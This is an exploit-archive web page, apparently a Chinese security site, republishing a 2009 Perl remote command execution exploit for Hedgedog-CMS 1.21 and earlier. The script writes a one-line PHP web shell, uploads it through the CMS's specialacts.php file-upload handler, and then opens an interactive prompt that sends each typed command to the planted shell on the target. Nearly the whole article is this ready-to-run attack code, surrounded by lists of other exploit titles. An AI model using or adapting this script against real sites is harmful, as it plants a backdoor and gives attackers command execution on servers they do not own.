首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Hedgedog-CMS <= 1.21 Remote Command Execution Exploit
来源:http://darkjoker.net23.net 作者:darkjoker 发布时间:2009-02-10  

--+++===================================================================+++--
--+++====== Hedgedog-CMS <= 1.21 Remote Command Execution Exploit ======+++--
--+++===================================================================+++--

#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;

sub usage
{
 print
  "\nHedgedog-CMS <= 1.21 Remote Command Execution Exploit".
  "\n[+] Author   : darkjoker".
  "\n[+] Site     : http://darkjoker.net23.net".
  "\n[+] Download : http://mesh.dl.sourceforge.net/sourceforge/hedgehog-cms/hedgehog-cms_v1.21.zip".
  "\n[+] Usage    : perl ${0} <hostname> <path>".
  "\n[+] Ex.      : perl ${0} localhost /hedgedogCMS".
  "\n\n";
 exit ();
}

sub upload_shell
{
 my ($host, $path) = @_;
 open SHELL, ">shell.php";
 print SHELL "<?php system (stripslashes (\$_GET ['cmd'])); ?>";
 close SHELL;
 my $url = "http://${host}${path}/specialacts.php";
 my $lwp = LWP::UserAgent->new;
 my $req = $lwp->request (
     POST $url,
     Content_Type => 'multipart/form-data',
     Content     => [l_mode => 1, l_file => ["shell.php"]],
    );
 unlink "shell.php";
 return 1 if ($req->is_success);
 return 0;
}

my ($host, $path) = @ARGV;
usage unless $path;
print "[-] Exploit failed.\n" unless upload_shell ($host, $path);
my $cmd;
my $url = "http://${host}${path}/user/upload/shell.php";
while (1)
{
 print "shell\@${host}: \$ ";
 $cmd = <STDIN>;
 chomp $cmd;
 exit if $cmd =~ /quit/;
 my $lwp = LWP::UserAgent->new;
 my $req = $lwp->get (
        $url . "?cmd=${cmd}",
       );
 print $req->decoded_content;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP Director <= 0.21 Remote Co
·Squid < 3.1 5 HTTP Version Num
·FeedDemon <=2.7 OPML Outline T
·TightVNC Authentication Failur
·w3bcms <= v3.5.0 Multiple Remo
·Hedgedog CMS version 1.21 remo
·IF-CMS <= 2.0 (frame.php id) B
·Php168 v2008 权限提升漏洞
·Orbit Downloader V2.8.5 Malfor
·1024 CMS <= 1.4.4 Remote Comma
·Nokia N95-8 browser crashing d
·q-news 2.0 Remote Command Exec
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved